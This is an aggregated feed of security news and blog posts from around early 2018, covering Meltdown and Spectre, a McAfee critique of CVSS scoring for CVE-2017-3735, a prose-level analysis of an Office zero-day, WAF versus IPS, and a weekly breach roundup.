Verify that your AV is compatible with the patches:
https://docs.google.com/spreadsheets/d/184wcDt9I9TUNFFbsAVLpzAtckQxYiuirADzf3cL42FQ/htmlview?sle=true#gid=0

There have been reports that the patches have cause 10 - 30% reduction in speeds of systems (Which Intel Denies). We might to wait and watch for at least a week to get clarity on this issue.


A note to the security community:

It would be easy to blame the chipset manufacturers and point fingers at them. But we really dropped the ball on this one. What should have been found much much earlier has taken decades to come to light and now it is gonna affect us for years.

Why is that ?

Have all of us been too concentrated on OS,Application,Networking and Web level vulnerabilities that we have completely forgotten to check the base they all run on ?

I think all of us (Including me) should start to looking into how we can help to identify such vulnerabilities in the future.


We should also have a serious look into disclosure time-lines and practices . Who decides how to approach disclosure of such high impact vulnerabilities ? Yes I understand the logic that the "bigger" tech companies are given first priority so that majority of users are patched. But such a long drawn out time-line (This bug was found in June 2017, 6 months ago) seriously puts the small guys at risk as it increases the chances of one rouge person exploiting such vulnerabilities silently.

While the US CERT might have been aware of this vulnerability.Were regional CERT's like CERT-IN informed ? Why not ?

From reading the first set of advisories I can see that only "WESTERN" companies seems to have been aware of this vulnerability before Jan3rd. Why is that ? Does our industry have a bias ? Think on this.

https://meltdownattack.com/#faq-advisory


This also brings in ethically gray issues like this:
https://www.businessinsider.in/intel-was-aware-of-the-chip-vulnerability-when-its-ceo-sold-off-24-million-in-company-stock/articleshow/62359605.cms

Should our CIOS , CTO's and CEO's be allowed to sell company stock once they know that there is security breach or a vulnerability ? Who watches them and ensures compliance ? Are the current laws against insider trading enough ? All such questions that need to answered sooner or later. ..


References:
https://en.wikipedia.org/wiki/Speculative_execution
https://meltdownattack.com/meltdown.pdf
https://spectreattack.com/spectre.pdf
https://meltdownattack.com/
https://googleprojectzero.blogspot.in/2018/01/reading-privileged-memory-with-side.html
http://blog.cyberus-technology.de/posts/2018-01-03-meltdown.html

Critical Unpatched Flaws Disclosed In Western Digital ‘My Cloud’ Storage Devices

Security researchers have discovered several severe vulnerabilities and a secret hard-coded backdoor in Western Digital's My Cloud NAS devices that could allow remote attackers to gain unrestricted root access to the device. Western Digital's My Cloud (WDMyCloud) is one of the most popular network-attached storage devices which is being used by individuals and businesses to host their files,

[Guide] How to Protect Your Devices Against Meltdown and Spectre Attacks

Recently uncovered two huge processor vulnerabilities called Meltdown and Spectre have taken the whole world by storm, while vendors are rushing out to patch the vulnerabilities in its products. The issues apply to all modern processors and affect nearly all operating systems (Windows, Linux, Android, iOS, macOS, FreeBSD, and more), smartphones and other computing devices made in the past 20

Decyphering the Noise Around ‘Meltdown’ and ‘Spectre’

The McAfee Advanced Threat Research (ATR) Team has closely followed the attack techniques that have been named Meltdown and Spectre throughout the lead-up to their announcement on January 3. In this post, McAfee ATR offers a simple and concise overview of these issues, to separate fact from fiction, and to provide insight into McAfee’s capabilities and approach to detection and prevention.

There has been considerable speculation in the press and on social media about the impact of these two new techniques, including which processors and operating systems are affected. The speculation has been based upon published changes to the Linux kernel. McAfee ATR did not want to add to any confusion until we could provide our customers and the general public solid technical analysis.

A fully comprehensive writeup comes from Google Project Zero in this informative technical blog, which allowed ATR to validate our conclusions. For more on McAfee product compatibility, see this business Knowledge Center article and this Consumer Support article.

The Techniques

Meltdown and Spectre are new techniques that build upon previous work, such as “KASLR”  and other papers that discuss practical side-channel attacks. The current disclosures build upon such side-channel attacks through the innovative use of speculative execution.

Speculative execution has been a feature of processors for at least a decade. Branch speculation is built on the Tomasulo algorithm. In essence, when a branch in execution depends upon a runtime condition, modern processors make a “guess” to potentially save time. This speculatively executed branch proceeds by employing a guess of the value of the condition upon which the branch must depend. That guess is typically based upon the last step of the same branch’s previous execution. The conditional value is cached for reuse in case that particular branch is taken again. There is no loss of computing time if the condition arrives at a new value because the processor must in any event wait for the value’s computation. Invalid speculative executions are thrown away. The fact that invalid speculations are tossed is a key attribute exploited by Meltdown and Spectre.

Despite the clearing of invalid speculative execution results without affecting memory or CPU registers, data from the execution may be retained in the processor caches. The retaining of invalid execution data is one of the properties of modern CPUs upon which Meltdown and Spectre depend. More information about the techniques is available on the site https://meltdownattack.com.

Because these techniques can be applied (with variation) to most modern operating systems (Windows, Linux, Android, iOS, MacOS, FreeBSD, etc.), you may ask, “How dangerous are these?” “What steps should an organization take?” and “How about individuals?” The following risk analysis is based upon what McAfee currently understands about Meltdown and Spectre.

There is already considerable activity in the security research community on these techniques. Sample code for two of the three variants was posted by the Graz University (in an appendix of the Spectre paper). Erik Bosman has also tweeted that he has built an exploit, though this code is not yet public. An earlier example of side-channel exploitation based upon memory caches was posted to GitHub in 2016 by one Meltdown-Spectre researcher Daniel Gruss. Despite these details, as of this writing no known exploits have yet been seen in the wild. McAfee ATR will continue to monitor researchers’ and attackers’ interest in these techniques and provide updates accordingly. Given the attack surface of nearly every modern computing system and the relative ease of exploitation, it is highly likely that at least one of the aforementioned variants will be weaponized very quickly.

McAfee researchers quickly compiled the public exploit code for Spectre and confirmed its efficacy across a number of operating systems, including Windows, Linux, and MacOS.

Weaponization

To assess the potential impact of any vulnerability or attack technique, we must first consider its value to attackers. These exploits are uniquely attractive to malicious groups or persons because the attack surface is nearly unprecedented, the attack vector is relatively new, and the impacts (privilege escalation and leaks of highly sensitive memory) are detrimental. The only naturally mitigating factor is that these exploits require local code execution. A number of third parties have already identified JavaScript as an applicable delivery point, meaning both attacks could theoretically be run from inside a browser, effectively opening an avenue of remote delivery. As always, JavaScript is a double-edged sword, offering a more user-friendly browsing experience, but also offering attackers an increased attack surface in the context of the browser’s executing scripted code.

Any technique that allows an attacker to cross virtual machine boundaries is of particular interest, because such a technique might allow an adversary to use a cloud virtual machine instance to attack other tenants of the cloud. Spectre is designed to foster attacks across application boundaries and hence applies directly to this problem. Thus, major cloud vendors have rushed to issue patches and software updates in advance of the public disclosure of these issues.

Additionally, both Meltdown and Spectre are exceptionally hard to detect as they do not leave forensic traces or halt program execution. This makes post-infection investigations and attack attribution much more complex.

Recommendations

Because we believe that Meltdown and Spectre may offer real-world adversaries significant value, we must consider how they can be used. There is no remote vector to these techniques; an attacker must first deliver code to the victim. To protect against malicious JavaScript, we always urge caution when browsing the Internet. Allow scripting languages to execute only from trusted sites. McAfee Windows Security Suite or McAfee Endpoint Security (ENS) can provide warnings if you visit a known dangerous site. These McAfee products can also provide an alternate script-execution engine that prevents known malicious scripts from executing.  As operating systems are changed to mitigate Meltdown and Spectre, organizations and individuals should apply those updates as soon as possible.

Even though we have not seen any malware currently exploiting these techniques, McAfee is currently evaluating opportunities to provide detection within the scope of our products; we expect most solutions to lie within processor and operating system updates. Based on published proofs of concept, we have provided some limited detection under the names OSX/Spectre, Linux/Spectre, and Trojan-Spectre.

Microsoft has released an out-of-cycle patch because of this disclosure:  https://support.microsoft.com/en-us/help/4056892/windows-10-update-kb4056892. Due to the nature of any patch or update, we suggest first applying manual updates on noncritical systems, to ensure compatibility with software that involves the potential use of low-level operating system features. McAfee teams are working to ensure compatibility with released patches where applicable.

While the world wonders about the potential impact of today’s critical disclosures, we also see a positive message. This was another major security flaw discovered and communicated by the information security community, as opposed to the discovery or leak of “in the wild” attacks. Will this disclosure have negative aspects? Most likely yes, but the overall effect is more global attention to software and hardware security, and a head start for the good guys on developing more robust systems and architectures for secure computing.

The post Decyphering the Noise Around ‘Meltdown’ and ‘Spectre’ appeared first on McAfee Blogs.

Hundreds of GPS Location Tracking Services Leaving User Data Open to Hackers

Security researchers have unearthed multiple vulnerabilities in hundreds of GPS services that could enable attackers to expose a whole host of sensitive data on millions of online location tracking devices managed by vulnerable GPS services. The series of vulnerabilities discovered by two security researchers, Vangelis Stykas and Michael Gruhn, who dubbed the bugs as 'Trackmageddon' in a

Huge Flaws Affect Nearly Every Modern Device; Patch Could Hit CPU Performance

UPDATE: Researchers have finally disclosed complete technical details of two kernel side-channel attacks, Meltdown and Spectre—which affect not only Intel but also systems and devices running AMD, ARM processors—allowing attackers to steal sensitive data from the system memory. ____________ The first week of the new year has not yet been completed, and very soon a massive vulnerability is

Critical Flaw Reported In phpMyAdmin Lets Attackers Damage Databases

A critical security vulnerability has been reported in phpMyAdmin—one of the most popular applications for managing the MySQL database—which could allow remote attackers to perform dangerous database operations just by tricking administrators into clicking a link. Discovered by an Indian security researcher, Ashutosh Barot, the vulnerability is a cross-site request forgery (CSRF) attack and

Critical “Same Origin Policy” Bypass Flaw Found in Samsung Android Browser

A critical vulnerability has been discovered in the browser app comes pre-installed on hundreds of millions of Samsung Android devices that could allow an attacker to steal data from browser tabs if the user visits an attacker-controlled site. Identified as CVE-2017-17692, the vulnerability is Same Origin Policy (SOP) bypass issue that resides in the popular Samsung Internet Browser version

Smashing Security podcast #058: Face ID, Firefox, and Windows SNAFUs, plus Bitcoin FOMO

Smashing Security podcast #058: Face ID, Firefox, and Windows SNAFUs, plus Bitcoin FOMO

Is Face ID racist? Has Mr Robot infected your Firefox browser? Has Microsoft pushed a buggy password manager onto your Windows PC?

All this and much much more is discussed in the special first birthday edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by original co-host Vanja Švajcer.

EVMs Company admits to be able to succumb to hacking

A thorough research into the technicalities of Electronic voting machine systems in India, it has been discovered that false information has been conveyed from the Election Commission of India to the Indian public and even to the Supreme Court. Details of possible EVM hacking take its roots from the information from the microchip manufacturer of

The post EVMs Company admits to be able to succumb to hacking appeared first on Hacker News Bulletin | Find the Latest Hackers News.

DHS finds first responder apps are plagued by security issues

While it's great that a consumer app like Waze started offering traffic data to help first responders avoid traffic, emergency professionals have been using their own suite of apps for awhile. But how safe are they? The Department of Homeland Security initiated a pilot program to vet the security of 33 different apps provided by 20 developers -- and found that 32 of them had potential security and privacy concerns and more serious vulnerabilities.

Via: CNET

Source: Department of Homeland Security

Canadian national’s involvement in Yahoo hacking case

The most important development in the Yahoo hacking case has shocked the world. This renowned case that involved the hacking of almost 500 million Yahoo accounts had the law enforcement agencies on their tiptoes for quite a long time. Now a Canadian citizen named Karim Baratov aged 22 has pleaded guilty to aid some Russian

The post Canadian national’s involvement in Yahoo hacking case appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Don’t Substitute CVSS for Risk: Scoring System Inflates Importance of CVE-2017-3735

I am a wry observer of vulnerability announcements. CVE-2017-3735—which can allow a small buffer overread in an X.509 certificate—presents an excellent example of the limitations of the Common Vulnerability Scoring System (CVSS). This scoring system is the de facto security industry standard for calculating and exchanging information about the severity of vulnerabilities. The problem is that CVSS is used for far more than it was intended.

For many organizations, security tools, and risk assessments, a CVSS score has become the security industry’s shorthand substitute for risk scoring and impact rating. In fact, many organizations measure their ongoing risk posture by counting the number of unfixed vulnerabilities and their associated CVSS scores.

The McAfee Product Security Incident Response Team (PSIRT) uses CVSS Version 3.0 as an important tool to assess vulnerabilities. McAfee PSIRT augments CVSS with other risk analysis techniques, similar to Microsoft PSIRT’s Exploitability Index and Security Update Severity Rating System.

CVSS is useful, but must not be confused with deeper risk assessment. Strictly relying on CVSS for vulnerabilities such as OpenSSL’s CVE-2017-3735 is likely to cause incident responders to focus their organizations’ resources on patch cycles that may be unnecessary. In addition, PSIRT credibility and influence may be squandered on low-impact, low-probability issues. Due to the sheer volume of issues being discovered and reported, PSIRT must remain focused on those that have a high probability of exploitation and whose organizational impact or attacker value make them worthy of exploitation.

But as we shall see from the following analysis, a vulnerability itself, taken out of context, cannot be equated to risk. Furthermore, CVSS has an inherent problem in that the impact is averaged against the exploitability: From the attacker’s perspective, this is a mistake, because threat actors exploit vulnerabilities to suit their goals, not just because something is easy.

For those readers whose sole interest is assessing OpenSSL CVE-2017-3735, this issue, I believe, should be rated as a low to very low risk. Although easy to perform, exploitation does not offer an attacker much of value. The most likely impact will be cosmetic within a text display. Plus, the code in which CVE-2017-3735 occurs is not called from OpenSSL’s protocol and cryptographic functions,[1] but is rather confined to the display of an X.509 certificate, typically for users consumption. (Certificate display does not take place as a part of typical cryptographic functions.)

Taking either of the competing published CVSS scores for this vulnerability, 5 or 7.5, at face value is misleading. Without further analysis, one might be tempted to raise the risk from CVE-2017-3735 beyond its rather minor impact. That is why I decided to investigate further, including reading the offending module’s code on GitHub. The CVSS measure of CVE-2017-3735 provides a situation where accurate scoring does not match the likelihood of exploitation and increases the score above what a risk analysis would probably reach.

Although it is true that attackers must choose exploits that lie within their technological capabilities—namely, exploits that are easy enough to ensure success—the first concern will nearly always be, “What will the exercise of this vulnerability achieve for me?”

In other words, what matters is the impact or result from the exploitation that is key to choosing a particular attack, not its relative ease or difficulty. If a vulnerability advances the attacker’s goals, then it will be considered for use. If there is nothing to gain, the vulnerability will not be exploited.

Limits to CVSS

Attackers exploit vulnerabilities that further their goals: That is a key point when assessing the potential for harm of any vulnerability. In this analysis, we will take a closer look at CVE-2017-3735 for its potential value to attackers. Along the way, we will also examine some of the limitations of CVSS as it applies to this vulnerability.

I do not mean to assert that CVSS is not an important tool for assessing vulnerabilities. I have worked with CVSS since before Version 1 was published; CVSS is key to prioritizing initial responses to vulnerabilities as they are released. CVSS may comprise one component of a robust risk rating method or approach.

I like to characterize CVSS as “potential severity.” A CVSS score, when fairly calculated,[2] can indicate what any vulnerability might harm. CVSS scores are particularly useful for triage, before a deeper analysis.

The McAfee PSIRT makes use of CVSS as a core component of incident response, just as many organizations PSIRTs do. As a CVE Numbering Authority, McAfee PSIRT must calculate a CVSS score for every published vulnerability. In practice, nearly every potential issue is scored as a critical foundation of PSIRT’s robust risk assessment.

Still, despite the importance of CVSS to vulnerability triage, it is a mistake to confuse a CVSS score with a risk rating, as we shall see.

CVE-2017-3735 has had two competing CVSS scores published.[3] The difference is in the rating of the impact: Integrity = High or Integrity = Low, resulting in a combined score of either 7.5 or 5.3 (in CVSS Version 3.0). In either case, both scores earn the exploitability rating of 10, because the issue may be exploited over a network without authentication.

CVSS = 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

(From: https://nvd.nist.gov/vuln/detail/CVE-2017-3735)

CVSS = 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

(From: https://nvd.nist.gov/vuln/detail/CVE-2017-3735)

How can there be two CVSS calculations? Why is one calculation High and one Low? Plus, is Integrity the correct impact parameter?

We can answer these questions by analyzing what the vulnerability allows.

The vulnerability is a buffer overread. An attacker may read one more byte from program memory than should be allowed. The attacker’s advantage of the unallowed access is directly related to where that extra byte exists. After looking at the code on GitHub, it appears all buffers in that module are allocated from program heap memory. Although running programs can exhibit macro patterns in their heap allocations and deallocations, generally, we can assume that any allocation may reside wherever it is convenient for the program memory manager to grab a piece of memory sufficiently large to support the request. This introduces an element of entropy (randomness) into any particular allocation. Each allocation may come from any portion of heap memory; there is no guarantee of a particular address.

Because a particular address cannot be guaranteed, an overread will get whatever bytes happen to be larger than that allocation’s required size.

Whichever data happen to be at that address is what the overread vulnerability will retrieve. Buffer overread exploitation can be a fishing expedition; there are no guarantees of the data retrieved, though there may be macro patterns in programs in which runtime processing is relatively consistent from run to run. The data returned depends on how lucky the attacker is. We saw the same situation in the Heartbleed overread vulnerability.

Just One Byte

For CVE-2017-3735, the overread is precisely a single byte. That is a very small payoff for the attacker, especially considering that there is no guarantee of what that byte might contain.

Furthermore, even if this were not an overread but rather an overflow (which it is not), a single byte is not enough space for malicious code to allow an attacker to exit to a command shell. A buffer overread does not allow an attacker to push code into a program heap. It allows an attacker only to retrieve data (a single byte) that the attacker should not have reached.

Although we may be surprised some day by a clever attacker’s ingenious use of a single byte, today we see no way that anyone can benefit.

If CVE-2017-3735 allows an attacker to retrieve only a single byte, then why have CVSS scorers used the Integrity impact rather than Confidentiality? Heartbleed, a heap buffer overread that returned nearly 64KB to the attacker, impacted Confidentiality. Attackers retrieved data they should not have been able to access. Yet CVE-2017-3735 has been scored on Integrity. There is a clue alongside the description.

Because I do not have access to the graph of code calls to the vulnerable IPAddressFamily routines, I cannot confirm the following educated guess. However, typical cryptographic and protocol implementations do not dump certificates to text; primarily users do. Which indicates that an attacker does not retrieve the extra byte. Instead, the extra byte is converted to text in the IPAddressFamily certificate extension’s human-readable dump. Thus the integrity of the text representation of an X.509 certificate has been impacted. With this understanding of the impact, scorers have used Integrity rather than Confidentiality.

If the attacker retrieves the text dump, is there a way to track back from various text irregularities to the value of the extra byte? I have not looked at a range of dumps to confirm or deny. Perhaps this is either not possible or not a productive approach.

If there is any way to retrieve the data byte, then the proper CVSS score would have to be Confidentiality = Low rather than None, which would increase the CVSS score to either 6.5 or 8.2, depending upon Integrity’s value, Low or High.

A CVSS score of even 5.3 gives a luster of importance to CVE-2017-3735 that it does not deserve. Any of the potentially higher scores suggest the wrong direction, which is probably why scorers refrained from including the potential for a confidentiality impact. Still, we should analyze this score to understand the strengths and limitations of CVSS. If scored for all impacts and the ease of exploitation at 6.5, CVSS indicates that this is an important vulnerability that should be addressed in a timely manner. Yet if my analysis is correct, CVE-2017-3735 should not move to the top or even middle of anyone’s work queue. Patch it in due time, through scheduled update cycles. Nothing more.

The potential impact from CVE-2017-3735 is probably not significant in the vast majority of OpenSSL’s use cases. Integrity = Low, maybe Confidentiality = Low, too. Attacker utility = None.

In fact, the most often published description for CVE=2017-3735 indicates the trivial nature of any impact: “The most likely result would be an erroneous display of the certificate in text format.” (See References.[4])

After reading this analysis, I hope it is clear that CVSS fails to account for the complete situation with respect to CVE-2017-3735.

Unequal Weights

As we mentioned, the exploitability and impact scores are each weighted equally (actually, averaged). From the attacker’s view, this is inaccurate.

Attackers do not equally exploit every vulnerability. More important, attackers do not choose to exploit a vulnerability simply because it is easy to exploit. They have no time for that; attackers are trying to achieve their goals, whatever those may be. Anyone prioritizing vulnerability responses needs to keep this in mind as we analyze.

The following published description for CVE-2017-3735 is, at the very least, misleading and erroneous, considering the single-byte heap buffer overread affects only a user-initiated text dump:

“Successfully exploiting this issue will allow attackers to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.”

There are no “security restrictions” involved in a certificate transformed to text. Further, a single byte is insufficient to enable “launching further attacks” even if the issue were more than an overread: The attacker cannot gain control of program memory through this flaw.

Quite often, organizations have hundreds or thousands of vulnerabilities to examine. To which should they respond first? Which response should get the most resources? Which of the perhaps dozens of vulnerabilities announced in any week or month can be allowed to remain open in the face of limited resources?

These are fundamental questions that every organization must answer, probably every day. One way to prioritize is to begin assessing the potential impact to the organization and the potential utility to the attacker. These two dimensions are more important than how easy or difficult a vulnerability is to exploit, although that also important information once we determine that a vulnerability is significant.

Calculating CVSS helps practitioners identify those items that warrant deeper analysis. Unfortunately, due to the way that a CVSS base score is averaged across the exploitability and the impact dimensions, CVSS in some instances fails to sufficiently assess risk, especially in cases where utility to an attacker appears to be relatively insignificant.

The McAfee PSIRT uses CVSS as a critical tool for triaging vulnerabilities and for gauging response times. Still, CVSS is no substitute for a deeper risk analysis when it is warranted.

Notes

[1] We did not have access for this analysis to an OpenSSL code graph, which would have allowed a definitive examination of calls to the vulnerable code. However, it appears from a cursory examination that the module is primarily called upon user instigation, from command-line tools, not during protocol processing.

[2] There are numerous cases of scores being inflated or deflated to fit the agenda of the scorer. How can cross-site scripting scores range from 1.8 to 9? That seems impossible, but a simple search will return that range of scores from Mitre’s CVE data.

[3] Vendors may calculate alternate scores for their products, which will be dependent upon particular vendor circumstances.

[4] One published description seems to vary considerably. The following does not seem to match our reading of the code or the behavior of a single-byte heap buffer overread:

“Successfully exploiting this issue will allow attackers to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.”

The post Don’t Substitute CVSS for Risk: Scoring System Inflates Importance of CVE-2017-3735 appeared first on McAfee Blogs.

Researchers find hundreds of easily-breached messaging apps

The security of our personal data is top of mind right now, so the news that nearly 700 apps for iOS and Android were easily exploited to show private messages and calls is troubling, to say the least. Security company Appthority discovered the exploit, dubbed "Eavesdropper," and published its findings this morning. According to the company's research, up to 180 million Android devices could be affected, as well as an unknown number of iOS devices.

Via: Reuters

Source: Appthority

Analyzing Microsoft Office Zero-Day Exploit CVE-2017-11826: Memory Corruption Vulnerability

McAfee Labs has performed frequent analyses of Office-related threats over the years: In 2015, we presented research on the Office OLE mechanism; in 2016 at the BlueHat conference, we looked at the high-level attack surface of Office; and this year at the SYSCAN360 Seattle conference, we presented deep research on the critical Office “Moniker” zero-day vulnerabilities.

This month, Microsoft released an update for an Office zero-day attack. We examined an in-the-wild sample, and with this post we share our findings to help others understand the threat.

The sample arrives as an RTF file, and embeds at least three objects (through the control word “\object”). This is a memory corruption vulnerability, so it needs additional steps to archive the full exploitation.

1. The first object, in the following figure, shows that it loads a COM object whose CLASSID is D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731.

 

If we look into the Windows registry, we see that the COM DLL C:\Windows\system32\msvbvm60.dll will be loaded. The purpose of loading this DLL is that msvbvm60.dll is not compatible with address space layout randomization (ASLR), thus it can be used to bypass ASLR and data execution prevention (DEP) on older Office versions. (We will explain later.) This is not a new trick; researcher Parvez Anwar described this process in 2015.

2. The second object is a .docx file that employs the ActiveX.bin technique to spray the heap, also not a new trick. McAfee Labs first identified this exploitation technique in a zero-day attack discovery in 2013; our colleague Debasish Mandal discussed this technique in one of his recent posts.

3. The third object is the cause of this vulnerability. It is an embedded .docx file. When this .docx is rendered, a memory corruption vulnerability is triggered. Specifically, we have identified the problem is due to mishandling of nested tags in the Office Open XML format. The key tags follow:

With help from the first and the second steps, an attacker can hijack the program’s control flow to a predictable address in msvbvm60.dll’s code by exploiting the memory corruption vulnerability. This is the classic step of “stack pivot” for defeating ASLR and DEP. (See the next figure.) Following the return-oriented programming chain and shellcode comes the main payload, which we will not discuss in this post.

This exploitation technique works only on older Office versions. Since Office 2013, Microsoft has employed the security feature Forced-ASLR. As its name suggests, the feature forces the randomization of a module’s loading address even if the DLL is not ASLR compatible. Thus this in-the-wild attack can work only on Office 2010 and older versions. Nonetheless, because the underlying vulnerability does affect newer versions of Office, we recommend that all Office users install the official patch as soon as possible.

For McAfee NSP customers, we have released signature 0x45219c00 (UDS-HTTP: Microsoft Office Memory Corruption Vulnerability (CVE-2017-11826)) to prevent this attack.

Thanks to my colleague Bing Sun for his help with the analysis.

The post Analyzing Microsoft Office Zero-Day Exploit CVE-2017-11826: Memory Corruption Vulnerability appeared first on McAfee Blogs.

WAF and IPS. Does your environment need both?

WAF and IPS. Does your environment need both?

I have been in fair amount of discussions with management on the need for WAF, and IPS; they often confuse them and their basic purpose. It has been usually discussed after a pentest or vulnerability assessment, that if I can't fix this vulnerability - shall I just put an IPS or WAF to protect the intrusion/ exploitation? Or, sometimes they are considered as the silver bullet to thwart off the attackers instead of fixing the bugs. So, let me tell you - This is not good!

The security products are well suited to protect from something "unknown" or something that you have "unknowingly missed". It is not a silver bullet or an excuse to keep systems/ applications unpatched.

Security shouldn't be an AND/OR case. More the merrier only if they have been configured properly and each one of the product(s) has a different role to play under the flag of defense in depth! So, while I started this article as WAF vs. IPS - it's time to understand it's WAF and IPS. The ecosystem of your production environment is evolving and so is the threat landscape - it's more complex to protect than it was 5 years ago. Attackers are running at your pace, if not faster & a step ahead. These adversary as well piggy-back existing threats to launch their exploits. Often something that starts as simple as DDOS to overwhelm your networks, concedes in an application layer attack. So, network firewall, application firewall, anti-malware, IPS, SIEM etc. all have an important task and should be omnipresent with bells and whistles!

Nevertheless, whether it's a WAF or an IPS; each has it's own purpose and though they can't replace each other, they often have gray areas under which you can rest your risks. This blog will try to address these gray areas, and the associated differences to make life easier when it comes to WAF (Web Application Firewall) or IPS (Intrusion Prevention System). The assumption is both are modern products, and the IPS have deep packet inspection capabilities. Now, let's try to understand the infrastructure, environment and scope of your golden eggs before we can take a call which is the best way to protect the data,

  1. If you are protecting only the "web applications" running on HTTP sockets, then WAF is enough. IPS will be cherry on cake.
  2. If you are protecting all sorts of traffic - SSH, FTP, HTTP etc. then WAF is of less use at it can't inspect non HTTP traffic. I would recommend having a deep packet inspection IPS.
  3. WAF must not be considered as an alternative for traditional network firewalls. It works on the application layer and hence is primarily useful on HTTP, SSL (decryption), Javascript, AJAX, ActiveX, Session management kind of traffic.
  4. A typical IPS does not decrypt SSL traffic, and therefore is insufficient in packet inspection on HTTPS session.
  5. There is wide difference in the traffic visibility and base-lining for anomalies. While WAF has an "understanding" of traffic - HTTP GET, POST, URL, SSL etc. the IPS only understands it as network traffic and therefore can do layer 3/4 checks - bandwidth, packet size, raw protocol decoding/ anomalies but not the GET/ POST or session management.
  6. IPS is useful in cases where RDP, SSH or FTP traffic has to be inspected before it reaches the box to make sure that the protocol is not tampered or wrapped with another TCP packet etc.

Both the technologies have matured and have many gray areas of working but understand that WAF knows and capture the contents of HTTP traffic to see if there is a SQL injection, XSS or cookie manipulation but the IPS have very little or no understanding of the underlying application, therefore can't do much with the traffic contents. An IPS can't raise an alarm if someone is getting confidential data out, or even sending a harmful parameter to your application - it will let it through if it's a valid HTTP packet.

Now, with the information I just shared, try to have a conversation with your management on how to provide the best layered approach in security. How to make sure the network, and application is resilient to complex attacks and threats lurking at your perimeter, or inside.

Be safe.

Weekly Cyber Risk Roundup: DDoS Attacks Hit Sweden, Researchers Warn of ROCA

The Swedish Transportation Administration and other related agencies were among the week’s top trending cybercrime targets due to a series of distributed denial-of-service (DDoS) attacks that led to services being disrupted earlier this month.

2017-10-21_ITT

The DDoS attacks against the Swedish Transportation Administration affected all of its web-based systems, including the IT system that manages train orders, the administration’s email system, Skype, and its website. Officials said the disruption, which led to the driving of trains manually,  resulted in the stoppage and delays of some trains.

A spokesperson for the administration said (Swedish) that the DDoS attacks targeted its internet service providers, TDC and DGC; however, the attacks appeared designed to disrupt the administration’s services.

The following day saw additional DDoS attacks against the website of Sweden’s Transport Agency, as well as public transport operators Västtrafik in western Sweden, which briefly crashed the operator’s ticket booking app and online travel planner.  

The incident follows warnings from various DDoS mitigation providers about DDoS attacks. CDNetworks – which surveyed organizations in the UK, Germany, Austria, and Switzerland – found that more than half of the organizations were hit by DDoS attacks in the past year. A10 Networks warned that the number of organizations experiencing an average DDoS attack over 50 Gbps has quadrupled in the past two years. In addition, Incapsula researchers recently warned of a new “pulse wave” DDoS attack that provides an “easy way” for attackers to double their attack output. A Neustar report also found that DDoS attacks are frequently accompanied by other malicious activity, such as viruses, malware, ransomware, and lost customer data.

2017-10-21_ITTGroups

Other trending cybercrime events from the week include:

  • Large data leaks: The Republican phone polling firm Victory Phones had 223 GB worth of data stolen in what appears to be an attack against an unsecured MongoDB database that occurred in January 2017. The incident exposed data on hundreds of thousands of Americans who submitted donations to political campaigns. A researcher has discovered the personal information of millions of South Africans among a large dump of other data breaches. The data includes 30 million unique South African ID numbers, about 2.2 valid email addresses, and other personal information. We Heart It announced a data breach affecting 8 million accounts created between 2008 and November 2013.
  • Payment card breaches: Pizza Hut is warning that customers who used the company’s website or mobile app to place an order during a 28-hour period in early October may have had their information compromised. The online e-commerce platform Spark Pay is notifying customers of a payment card breach involving merchant websites after discovering malicious code on a server. Citizens Financial Group is notifying customers of an ATM skimming incident that occurred at a Citizens Bank ATM located in Cambridge, Massachusetts.
  • Other data breaches: Microsoft’s internal database for tracking bugs was hacked in 2013 revealing descriptions of critical and unfixed vulnerabilities for widely used software such a Windows. Transamerica Retirement Solutions is notifying some customers that it discovered unauthorized access to their retirement plan online account information due to the use of compromised third-party user credentials. Officials said the cryptocurrency exchange Bithumb was targeted with phishing emails containing malware and that led to the personal and financial information of at least 30,000 users being exposed. Chase Brexton Health Care is notifying 16,000 patients of a breach due to a phishing attack that led to the compromise of four employee email accounts and the attackers rerouting the victims’ paychecks to a bank account under their control. Namaste Health Care in Missouri is notifying approximately 1,600 patients of a ransomware infection that may have led to the attacker accessing their information. Rivermend Health is notifying 1,300 patients that their personal information may have been compromised due to a breach of an employee’s email account.
  • Other notable events:  The British TV production firm Mammoth Company was hacked by North Korean hackers after reports the company was creating a TV show about a British nuclear scientist taken prisoner in North Korea. The attack did not cause any harm, but it did cause widespread alarm, the BBC reported. Domino’s Australia said that it is investigating a potential issue with a former supplier’s system after a number of customers received unauthorized spam emails. A University of Kansas student was expelled after using a keylogger device to steal faculty credentials and change his grades.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.

2017-10-21_ITTNewCyber Risk Trends From the Past Week

2017-10-21_RiskScoresResearchers have discovered a vulnerability, dubbed “ROCA” (CVE-2017-15361), in the cryptographic smartcards, security tokens, and other secure hardware chips manufactured by Infineon Technologies AG, and that vulnerability could allow an attacker to calculate the private portion of an RSA key.

The vulnerability is due to the way the Infineon Trusted Platform Module firmware  “mishandles RSA key generation, which makes it easier for attackers to defeat various cryptographic protection mechanisms via targeted attacks,” the CVE states.

Chips manufactured as early as 2012 are affected by the vulnerability, the researchers said.

“The currently confirmed number of vulnerable keys found is about 760,000 but possibly up to two to three magnitudes more are vulnerable,” the researchers said. “We found and analyzed vulnerable keys in various domains including electronic citizen documents, authentication tokens, trusted boot devices, software package signing, TLS/HTTPS keys and PGP.”

Researchers said that malicious actors could feasibly use what’s known as a “practical factorization attack” against key lengths of up to 2048 bits, and if the attack is improved it could be used against 4096-bit RSA keys in the future. According to the researchers, the time and complexity cost associated with selected key lengths are:

  • 512 bit RSA keys – 2 CPU hours (the cost of $0.06);
  • 1024 bit RSA keys – 97 CPU days (the cost of $40-$80);
  • 2048 bit RSA keys – 140.8 CPU years (the cost of $20,000 – $40,000).

If a vulnerable key is found, organizations should contact their device vendor for further advice, the researchers said. Forbes reported that Fujitsu, Google, HP, Lenovo, and Microsoft have all pushed out fixes for their relevant hardware and software. The researchers will present their full findings at the ACM Conference on Computer and Communications Security later this month.


I know I haven’t patched yet, and there’s a zero-day knocking at my door

